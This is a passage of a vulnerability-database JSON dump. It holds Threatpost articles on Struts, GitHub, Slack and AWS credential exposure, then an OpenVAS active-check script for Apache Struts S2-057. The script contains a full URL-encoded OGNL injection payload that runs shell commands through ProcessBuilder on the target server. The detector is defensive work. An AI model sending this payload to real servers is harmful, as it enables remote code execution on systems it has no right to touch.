announcement of a patch and a company updating its software. There are many reasons why companies can\u2019t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure.\u201d\n", "cvss3": {}, "published": "2018-08-24T22:07:17", "type": "threatpost", "title": "PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T22:07:17", "id": "THREATPOST:2F30C320035805DB537579B86877517E", "href": "https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:55:19", "description": "When it comes to cloud computing, APIs more or less drive everything, but in the eyes of some researchers, existing security controls around them haven\u2019t kept pace.\n\nWhile individual components of a system can be secure, when that system gets deployed in the cloud it can often become insecure \u2013 and get worse at scale, according to Erik Peterson, a cloud technology researcher with Veracode. Peterson, who also refers to himself as a Cloud Security Weapons Manufacturer, described the \u2018Emergent Insecurity\u2019 of the cloud in a talk Wednesday at the Source Conference in Boston.\n\nEarly on in his presentation, Peterson recounted a [Chris Hoff](<https://twitter.com/Beaker>) quote that he claims sums up the concept: \u201cIf your security sucks now, you\u2019ll be pleasantly surprised by the lack of change when you move to cloud.\u201d\n\nIn particular Peterson warned about the dangers associated with API credential exposure, something which could easily lead to apps being rigged to spread malware, cloud infrastructure adapted for use in a Bitcoin mining operation, additional attacks being launched, and the most critical: the downloading of sensitive customer data.\n\n\u201cAPI access is the new equivalent to physical access,\u201d Peterson said, \u201cIf someone compromises your most sensitive API credential, it doesn\u2019t matter.\u201d\n\nAPI keys, which protect cloud metadata \u2013 information that usually includes Amazon Web Services (AWS) access credentials, and startup scripts \u2013 can often be the only thing standing between users and total compromise, he stressed.\n\nPeterson, who\u2019s researched cloud and architect solutions in AWS since 2009, warned that old, vintage software vulnerabilities can easily be leveraged for compromise.\n\nHe\u2019s seen it all: Server-side request forgery vulnerabilities, XML external entity vulnerabilities, command injection vulnerabilities, unintended proxy or intermediary vulnerabilities. Each one can lead to the unintended exposure of metadata, but when they all come together, it can result in a full stack hack, or what Peterson likens to \u201cdeath by 1,000 cuts.\u201d\n\nFor instance, he claims, if an attacker gained access to an API key they could escalate privileges. If they gained access to cloud DNS, it could reveal the private IP of the web server. If an attacker got access to an IP address, they could uncover an app that hasn\u2019t been tested. Once in, it\u2019s possible an attacker could do the worst, Peterson claims, clone the database for quiet extraction.\n\n\u201cLots of people are shuffling cloud data and not thinking of the flaws,\u201d Peterson said, \u201cthey all lead to exposing that user data, all that great info my system needs to startup.\u201d\n\nThere are ways to prevent a full stack hack, mainly through encryption, but common sense doesn\u2019t hurt either.\n\n\u201cNo more checking your API keys into GitHub,\u201d Peterson advised.\n\nAttackers often scour the service looking to exploit vulnerabilities and access cloud metadata API. Storing sensitive information like API keys there can be a quick lesson in futility. That still doesn\u2019t stop users from doing it though; a cursory search on the service for \u201cSECRET_ACCESS_KEY\u201d last year yielded 7,500 placeholder results, Peterson said.\n\nOne developer discovered 140 servers running on his Amazon Web Services account [last year](<https://it.slashdot.org/story/15/01/02/2342228/bots-scanning-github-to-steal-amazon-ec2-keys>) after a bot scanning GitHub sniffed out his Amazon Elastic Compute Cloud (EC2) keys.\n\nDevelopers should get off the old EC2 classic and lockdown their Simple Storage Service (S3) buckets, Peterson said Wednesday. If they aren\u2019t already, developers should log everything, especially API activity, he said, adding that some AWS tools, like [Cloudtrail](<https://aws.amazon.com/cloudtrail/>), which records AWS API calls, and [Netflix\u2019s Security Monkey](<https://threatpost.com/netflix-open-source-security-tools-solve-range-of-challenges/107931/>), which can be used to monitor and analyze AWS configurations, can be invaluable.\n\nInstead of trying to control change, developers should react to change, rethink their threat model and realize that lower priority software vulnerabilities, like SSRF, or XXE, can still be deadly, Peterson said.\n\n\u201cIf you have a key that an app is using ask yourself: What\u2019s the worst thing that could happen if it was compromised?\u201d Peterson asked aloud, \u201cIs there a path that leads to my entire environment getting deleted by some unknown entity?\u201d\n", "cvss3": {}, "published": "2016-05-19T14:20:22", "type": "threatpost", "title": "Protecting Cloud APIs Critical to Mitigating Total Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-19T18:20:22", "id": "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "href": "https://threatpost.com/protecting-cloud-apis-critical-to-mitigating-total-compromise/118197/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:56", "description": "GitHub recently awarded $18,000 to a researcher after he came across a bug in its GitHub Enterprise management console that could have resulted in remote code execution.\n\nThe company patched the vulnerability at the end of January, but news of the flaw didn\u2019t surface until this week when GitHub and Markus Fenske, a German independent pen-tester [disclosed it](<http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html>).\n\nGitHub Enterprise is an on-premises version of GitHub.com that can be used to deploy a GitHub service on their organization\u2019s local network. The vulnerability is a combination of two bugs, Fenske told Threatpost Thursday.\n\nOne problem stems from the fact that a static value was being used to cryptographically sign the Ruby on Rails session secret for the console. The secret value is supposed to be a randomly generated per-machine value used to sign the cookie, not a static value.\n\nGitHub acknowledged on Tuesday that the static secret was only supposed to be used for testing and development, but \u201can unrelated change of file permissions prevented the intended (and randomly generated) session secret from being used.\u201d\n\n\u201cFor testing purposes they replaced it with a static value and forgot to change it back,\u201d Fenske told Threatpost. In the production environment, there was a mechanism that should have replaced it with a random value. But it did not work.\u201d\n\nWhile GitHub shouldn\u2019t have been using a static secret to sign cookies that hold session data, the other problem, Fenske says, is that session data could be serialized with Marshal. [Marshal](<https://ruby-doc.org/core-2.2.2/Marshal.html>), a library that converts collections of Ruby objects into a byte stream, has a method, .load, that can return the result of converted serialized data.\n\nAs Fenske points out, [documentation](<https://ruby-doc.org/core-2.2.0/Marshal.html#method-c-load>) around Marshal.load says to \u201cnever pass untrusted data (including user supplied input) to this method,\u201d but that\u2019s what GitHub was doing.\n\nBy knowing the secret, an attacker could have forged a cookie, deserialized by Marshal.load, and tricked GitHub into running whatever code they wanted.\n\n\u201cBecause the secret is known, you can create a valid signature and pass arbitrary data to Marshal.load, which then leads to remote code execution,\u201d Fenske said.\n\nFenske says that while he sells sugar wax for hair removal by day\u2013[seriously](<https://www.bodypil.de/ueber-uns.html>)\u2013he hacks stuff by night. He founded an IT security consulting firm, Exablue, last month which he plans to use to carry out audits, pen-testing, and \u201cthe whole range\u201d going forward. He said he was inspired to poke around GitHub Enterprise after he stumbled upon a blogpost by Taiwanese hacker Orange Tsai about [a SQL injection](<http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html>) he found in the platform.\n\n\u201cAbout two minutes after decoding the source and opening the first file (config.ru) of the first application (the management interface), I noticed the vulnerability,\u201d Fenske said.\n\nGitHub fixed the vulnerability on Jan. 31 when it pushed out GitHub Enterprise 2.8.7. Now the service defaults to a randomly generated session secret if the initially configured session secret is not found.\n\nIt was a fairly quick turnaround for the company; the patch came only five days after Fenske reported the issue and earned him $10,000, the highest reward the company gives out through its bug bounty program, and [a spot in its Hall of Fame](<https://bounty.github.com/researchers/iblue.html>).\n\n\u200b\u201dWorking with GitHub is really nice,\u201d Fenske said, \u201cFor a company that big, their speed is amazing.\u201d\n\nThe researcher had no idea when he submitted the bug, however, that the company was in the middle of a promotional bug bounty period. The company [announced the promotion](<https://github.com/blog/2302-bug-bounty-anniversary-promotion-bigger-bounties-in-january-and-february>), which stretched from January to February, to celebrate the third anniversary of its [bug bounty program](<https://bounty.github.com/#rules>) with HackerOne.\n\nAfter he sent a draft of his disclosure to the company this week, Fenske discovered his bug was severe enough to fetch an additional $8,000 bounty and [second place in the contest](<https://github.com/blog/2332-bug-bounty-third-anniversary-wrap-up>).\n\n\u201cI was just writing my article and sent GitHub a draft to look at, and the answer came within minutes, telling me that I can publish whatever I like and that they gave me more money,\u201dhe said, \u201cI did not know about that extra contest and was very pleasantly surprised.\u201d\n\nFenske\u2019s bug was one of three GitHub fixed in its Enterprise product to qualify for additional bug bounty money. The company also fixed two separate SAML authentication bypass bugs in the service.\n\nFenske said the latest release of GitHub Enterprise uses a secret that\u2019s 16 random bytes written in hex.\n\n\u201cI quickly calculated that cracking it will take about 469142742208 gigayears on a 8-GPU instance (for comparison: The Sun will be gone in 7.7 gigayears). I think it\u2019s secure now.\u201d\n", "cvss3": {}, "published": "2017-03-17T09:00:04", "type": "threatpost", "title": "GitHub Code Execution Bug Fetches $18,000 Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-03-16T23:38:35", "id": "THREATPOST:E984089A4842B564B374B807AF915A44", "href": "https://threatpost.com/github-code-execution-bug-fetches-18000-bounty/124378/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:34", "description": "Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it\u2019s also a trove of potentially sensitive company and project information that\u2019s likely to warrant attention from hackers.\n\nAn application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead. [Gitrob](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>) is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns looking for potentially sensitive information that isn\u2019t meant for public consumption.\n\nIts developer Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub\u2019s public API to query a Github organization\u2019s list of public members.\n\n\u201cWhen the list of members is obtained, it queries GitHub again for each member that returns a list of their public repositories,\u201d Henriksen told Threatopst. \u201cThe contents of the repositories are never downloaded to the machine, it simply uses GitHub\u2019s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub\u2019s servers.\u201d\n\nHenriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra webserver is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually.\n\n\u201cAll the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file\u2019s database record, before it is saved to the database,\u201d Henriksen said. \u201cRight now, Gitrob actually only contains one observer which will flag files that match [patterns of interesting files](<https://github.com/michenriksen/gitrob/blob/master/patterns.json>), but the design makes it easy to introduce new logic to look for other things. The patterns are built in to the tool itself.\u201d\n\nSecurity analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public.\n\n> OSINT #Gitrob mines GitHub for sensitive information that isn\u2019t meant for public consumption.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgitrob-combs-github-repositories-for-secret-company-data%2F110380%2F&text=OSINT+%23Gitrob+mines+GitHub+for+sensitive+information+that+isn%26%238217%3Bt+meant+for+public+consumption.>)\n\n\u201cA security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,\u201d Henriksen said. \u201cThe current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.\u201d\n\nHenriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob from username-password combinations, email addresses, internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative he said.\n\n\u201cI am not aware of any tool that specifically targets GitHub organizations like Gitrob does,\u201d Henriksen said. \u201cPeople have been finding sensitive files with GitHub\u2019s search functionality for a while (kind of like Google dorks for Github), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.\u201d\n\nInstallation instructions and requirements can be found on [his Github page](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>).\n\n[_Image courtesy othree._](<https://www.flickr.com/photos/othree/>)\n", "cvss3": {}, "published": "2015-01-13T12:55:07", "type": "threatpost", "title": "Gitrob Combs Github Repositories for Secret Company Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-16T13:26:31", "id": "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "href": "https://threatpost.com/gitrob-combs-github-repositories-for-secret-company-data/110380/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:25", "description": "Popular collaboration and communication firm Slack rushed to plugged a security hole in its platform Thursday that was leaking some of its users\u2019 private chats and files for anyone to access.\n\nSlack, a leading tool used by companies to communicate internally, was alerted by security firm Detectify Labs who discovered Slack users were unwittingly sharing sensitive company information on the dev site GitHub.\n\nGitHub, another popular service used by the developer community to collaborate on projects, was unknowingly hosting hundreds of Slack bots that contained API information (or Slack tokens) that unintentionally gave third parties access to private Slack networks and data stored on them.\n\nSlack bots are created by companies to be used on their private Slack platform. They can serve either silly or serious purposes. For example, a Slack bot could be programmed to reboot servers by a user who simply types the request \u201cSlack bot, please reboot server\u201d. Another Slack bot request might be \u201cWhat\u2019s the weather for tomorrow?\u201d\n\nOver the years, thousands of Slack bots have been created by companies to carry out these conversational instructions. Hundreds of those developers decided to share their Slack bot programming code on sites such as GitHub. The idea is, other developers might want to reuse a useful Slack bot or modify the code so the Slack bot can do something new.\n\n\u201cThese developers were proud of their creation. They wanted to share their hard work with the rest of the developer community,\u201d said Rickard Carlsson, CEO of Detectify in an interview with Threatpost.\n\nThat\u2019s where developers ran into trouble. Unbeknownst to the developers sharing their Slack bots with GitHub was the fact they were also uploading their company\u2019s unique API key or token inside the Slack bot code. That meant a third-party could remove the Slack token and use it to hack into the Slack account of the person who originally created it.\n\nWhen Detectify searched for Slack tokens left behind on GitHub it discovered that those tokens could be used to access chats, files and private message data shared among Slack developer teams.\n\nAffected, Carlsson told Threatpost, were tokens belonging to individual users but also Fortune 500 companies, payment providers, multiple internet service providers and health care providers. In one case, Detectify reported it stumbled upon everything from \u201crenowned advertising agencies that want to show what they are doing internally. University classes at some of the world\u2019s best-known schools. Newspapers sharing their bots as part of stories.\u201d\n\nIn a [blog post outlining its discovery](<https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/>) Thursday, Detectify wrote, \u201cIn the worst case scenario, these tokens can leak production database credentials, source code, files with passwords and highly sensitive information.\u201d Detectify said it discovered the flaw earlier this month.\n\nAt first, Slack acknowledged the problem, but reminded researchers at Detectify that it\u2019s the users\u2019 responsibility to not share tokens and remove them when they are no longer needed. Slack has since updated its positions on tokens, telling Detectify \u201cWe\u2019re proactively looking for tokens ourselves now, and reaching out to customers to let them know when we\u2019ve disabled tokens and where we found them. We\u2019ll deactivate these in the next batch.\u201d\n\nSlack\u2019s email sent to its customers explaining the situation can be read online [via Detectify\u2019s website](<https://labs.detectify.com/wp-content/uploads/2016/04/Screen-Shot-2016-04-28-at-14.53.38.png>). In it the company said it would seeking out tokens it believed companies did not want to share intentionally, and deactivating them. \u201cTo help protect your team\u2019s information, we\u2019re taking the precautionary step of permanently disabling the affected tokens on your behalf,\u201d it wrote.\n\nIn a separate statement made to press Slack stated: \u201cSlack is clear and specific that tokens should be treated just like passwords. We warn developers when they generate a token never to share it with other users or applications. Our customers\u2019 security is of paramount importance to us, and we will continue to improve our documentation and communications to ensure that this message is urgently expressed.\u201d\n\nDetectify\u2019s last piece of advice: \u201cNever commit credentials inside code. Ever.\u201d\n", "cvss3": {}, "published": "2016-04-30T07:25:42", "type": "threatpost", "title": "Slack Plugs Token Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-03T13:46:42", "id": "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "href": "https://threatpost.com/slack-plugs-token-security-hole/117750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "The U.S. Army has released to open source an internal forensics analysis framework that the Army Research Lab has been using for some time.\n\nThe framework, known as Dshell, is a Python tool that runs on Linux and its designed to help analysts investigate compromises within their environments. The goal in open sourcing the framework is to encourage outside developers and analysts to develop and contribute their own modules, based on their experiences.\n\n\u201cOutside of government there are a wide variety of cyber threats that are similar to what we face here at ARL,\u201d William Glodek, Network Security branch chief at the Army Research Laboratory, said in a [statement](<http://www.army.mil/article/141734>).\n\n\u201cDshell can help facilitate the transition of knowledge and understanding to our partners in academia and industry who face the same problems.\u201d\n\nThe Dshell framework is available on [GitHub](<https://github.com/USArmyResearchLab/Dshell>), and Glodek said in his statement that he hopes that users in private industry and the academic community will find the framework useful and be able to contribute their own modules and help expand the framework\u2019s functionality.\n\n\u201cThe success of Dshell so far has been dependent on a limited group of motivated individuals within government. By next year it should be representative of a much larger group with much more diverse backgrounds to analyze cyber attacks that are common to us all,\u201d Glodek said.\n\nThe release of Dshell comes shortly after [Cisco released its own OpenSOC security analytics framework](<https://threatpost.com/cisco-releases-security-analytics-framework-to-open-source/109415>) on [GitHub](<https://opensoc.github.io/>) in November. That framework is designed specifically for large network environments and provides some anomaly detection and incident forensics capabilities.\n\n\u201cOpenSOC is a Big Data security analytics framework designed to consume and monitor network traffic and machine exhaust data of a data center. OpenSOC is extensible and is designed to work at a massive scale,\u201d the OpenSOC documentation says.\n", "cvss3": {}, "published": "2015-01-30T10:59:44", "type": "threatpost", "title": "Army Research Lab Releases Dshell Forensics Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-02-03T21:08:15", "id": "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "href": "https://threatpost.com/army-research-lab-releases-dshell-forensics-framework/110766/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:56:47", "description": "An audit of the SSH keys associated with more than a million GitHub accounts shows that some users have weak, easily factorable keys and many more are using keys that are still vulnerable to the Debian OpenSSL bug disclosed seven years ago.\n\nThe public SSH keys that users associate with their GitHub account are visible to other users, a feature that enables users to share those keys with others. Last December researcher Ben Cox decided to collect as many of those keys as he could and see what he could find out about them. He began the project on Dec. 27 and by Jan. 9 he had collected more than 1.3 million SSH keys.\n\n\u201cI took a stab at this in 2013 but found that too many people didn\u2019t use GitHub in SSH mode and thus had no keys set. This time however (with a new program that used the events api) I found that the majority of active users had some SSH keys in there,\u201d Cox said in a blog [post](<https://blog.benjojo.co.uk/post/auditing-github-users-keys>) detailing the project.\n\nAfter collecting the keys, Cox began analyzing them. One of the things he looked at was the strength of the key, and he discovered that seven of the keys in his set were just 512 bits, and two others were 256 bits. Those key lengths are short enough to be in the range of factorization on many modern machines.\n\n\u201c512 bit keys have been known to be factorable in less than 3 days. The main example of this is the Texas Instruments calculator firmware signing key that was broken, allowing the modding community to upload any firmware that they wanted,\u201d Cox said.\n\n\u201cI tried on my own to make a 256 bit key and factor it, and the process took less than 25 minutes from having the public SSH key to the factoring of primes (on a subpar processer by today\u2019s standards, and then a few more minutes to transform those back into a SSH key that I could log into systems with. This risk isn\u2019t only real if someone had gathered together top of the line mathematicians or supercomputers worth of power, the 256 bit key I factored was factored on a i5-2400 in 25 mins.\u201d\n\nThe bigger issue, however, is that Cox found what he calls a \u201cvery large amount\u201d of SSH keys in the set that were vulnerable to the [Debian OpenSSL bug](<https://lists.debian.org/debian-security-announce/2008/msg00152.html>) from 2008. That vulnerability existed in certain versions of Debian and resulted from the fact that the OpenSSL random number generator included in those versions was predictable. That means that cryptographic keys generated with vulnerable versions could be guessable. The bug affected SSH keys, VPN keys, and DNSSEC keys, among others.\n\nCox compared the list of keys he had gleaned from GitHub to a list of keys affected by the Debian flaw and found that some of the accounts using vulnerable keys had access to some large and sensitive GitHub repositories. Some of those repositories include Yandex, the Russian search provider, Spotify, the cryptographic libraries for Python, and Python\u2019s core.\n\nCox disclosed the problem to GitHub in early March and the vulnerable keys were revoked on May 5. The other weak and low-quality keys he discovered were revoked on June 1.\n", "cvss3": {}, "published": "2015-06-03T07:37:04", "type": "threatpost", "title": "Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-06-04T15:34:07", "id": "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "href": "https://threatpost.com/audit-of-github-ssh-keys-finds-many-still-vulnerable-to-old-debian-bug/113117/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:06", "description": "Amazon Web Services is actively searching a number of sources, including code repositories and application stores, looking for exposed credentials that could put users\u2019 accounts and services at risk.\n\nA week ago, a security consultant in Australia said that as many as 10,000 secret Amazon Web Services keys could be found on Github through a simple search. And yesterday, a software developer reported receiving a notice from Amazon that his credentials were discovered on Google Play in an Android application he had built.\n\nRaj Bala printed a [copy of the notice](<http://blog.rajbala.com/post/81038397871/amazon-is-downloading-apps-from-google-play-and>) he received from Amazon pointing out that the app was not built in line with Amazon\u2019s recommended best practices because he had embedded his AWS Key ID (AKID) and AWS Secret Key in the app.\n\n\u201cThis exposure of your AWS credentials within a publicly available Android application could lead to unauthorized use of AWS services, associated excessive charges for your AWS account, and potentially unauthorized access to your data or the data of your application\u2019s users,\u201d Amazon told Baj.\n\nAmazon advises users who have inadvertently exposed their credentials to invalidate them and never distribute long-term AWS keys with an app. Instead, Amazon recommends requesting temporary security credentials.\n\nRich Mogull, founder of consultancy Securosis, said this is a big deal.\n\n\u201cAmazon is being proactive and scanning common sources of account credentials, and then notifying customers,\u201d Mogull said. \u201cThey don\u2019t have to do this, especially since it potentially reduces their income.\u201d\n\nMogull knows of what he speaks. Not long ago, he received a similar notice from Amazon regarding his AWS account, only his warning was a bit more dire\u2014his credentials had been exposed on Gitbub and someone had fired up unauthorized EC2 instances in his account.\n\nMogull wrote an [extensive description of the incident](<https://securosis.com/blog/my-500-cloud-security-screwup>) on the Securosis blog explaining how he was building a proof-of-concept for a conference presentation, storing it on Github, and was done in because a test file he was using against blocks of code contained his Access Key and Secret Key in a comment line.\n\nTurns out someone was using the additional 10 EC2 instances to do some Bitcoin mining and the incident cost Mogull $500 in accumulated charges.\n\nAmazon told an Australian publication that it will continue its efforts to seek out these exposed credentials on third-party sites such as Google Play and Github.\n\n\u201cTo help protect our customers, we operate continuous fraud monitoring processes and alert customers if we find unusual activity,\u201d _[iTnews](<http://www.itnews.com.au/News/381432,aws-admits-scanning-android-app-in-secret-key-hunt.aspx>) _quoted Amazon.\n\nSaid Mogull: \u201cIt isn\u2019t often we see a service provider protecting their customers from error by extending security beyond the provider\u2019s service itself. Very cool.\u201d\n", "cvss3": {}, "published": "2014-04-02T15:01:53", "type": "threatpost", "title": "Amazon Web Services Combing Third Parties for Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-04-04T19:14:11", "id": "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "href": "https://threatpost.com/amazon-web-services-combing-third-parties-for-exposed-credentials/105217/", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:27:09", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1130-1", "cvss3": {}, "published": "2011-05-17T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 USN-1130-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1764"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840659", "href": "http://plugins.openvas.org/nasl.php?oid=840659", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1130_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for exim4 USN-1130-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was 